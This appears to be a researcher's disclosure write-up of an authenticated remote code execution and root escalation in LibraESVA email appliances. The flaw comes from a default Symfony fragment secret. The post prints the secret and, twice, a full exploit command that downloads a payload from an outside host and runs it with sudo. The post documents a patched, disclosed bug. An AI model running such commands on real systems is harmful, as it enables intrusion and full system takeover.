Under construction
TL;DR: Based upon Symfony framework, LibraESVA exposed the FragmentListener class with well-know secret, leading to an authenticated RCE and subsequent privileges escalation to root.
Let’s dive in:
LibraEsva
The company LibraESVA proposes different solution for managing email ecosystem. From Email Security program to Load Balancer solution. Basically those products are suite for managing emails, ranging from user management to built-in security features like antivirus scan and phishing prevention mechanism.
Symfony RCE
Thanks to the excellent work by Ambionic Security on the Symfony Framework, it was possible to focus my research on the FragmentListener class. Quoting from their blog,
1
Essentially, when someone issues a request to /_fragment, this listener sets request attributes from given GET parameters. Since this allows to run arbitrary PHP code (more on this later), the request has to be signed using a HMAC value. This HMAC's secret cryptographic key is stored under a Symfony configuration value named secret.
Obviously we need to find this secret. Luckily this was a trivial task, as the Symphony’s well documented docs gives instruction where to find this value. The secret is located within the /xxx/yyy/zzz.conf file, unchanged from the default value.
RCE
Using the previous mentioned technique, it was possible to remotely execute command on the machine. This was achieved using the Ambionic’s Symfony Exploit found on their GitHub page. Building the command as following:
1
./secret_fragment_exploit.py https://192.168.11.120/_fragment -i "https://192.168.11.120/_fragment" -s '36b1f1aadcc7602eeedcd83cc7d5510e9b2a9bd5' -m 1 -f shell_exec -p cmd:"cd /tmp/; wget -qO upgradescript --no-check-certificate https://192.168.11.124:8443/QE4aPZwlxtk; chmod 777 upgradescript; sudo ./upgradescript disown
Privilage Escalation
Located in /tmp there is a SUID script file which is either writable and executable. The /tmp/upgradescript
The complete command to trigger the chain is:
1
./secret_fragment_exploit.py https://192.168.11.120/_fragment -i "https://192.168.11.120/_fragment" -s '36b1f1aadcc7602eeedcd83cc7d5510e9b2a9bd5' -m 1 -f shell_exec -p cmd:"cd /tmp/; wget -qO upgradescript --no-check-certificate https://192.168.11.124:8443/QE4aPZwlxtk; chmod 777 upgradescript; sudo ./upgradescript disown
Final thoughts
It is very important to run periodic vulnerability assessment and complete penetration testing on you own products, which seems that LibraEsva haven’t done. When developing a product based upon a framework, it is important to keep in mind that the framework itself could not be secure, that could lower the security of the overall project. Nonetheless, LibraEsva were very quick in triaging and fixing the bug.
Disclosure Timeline
| Date | Description |
|---|---|
| 18-03-2021 | LibraEsva’s developers team informed about the vuln |
| 07-04-2021 | Fix released with product version 4.9.5 |
| 27-07-2021 | Public release |
Comments powered by Disqus.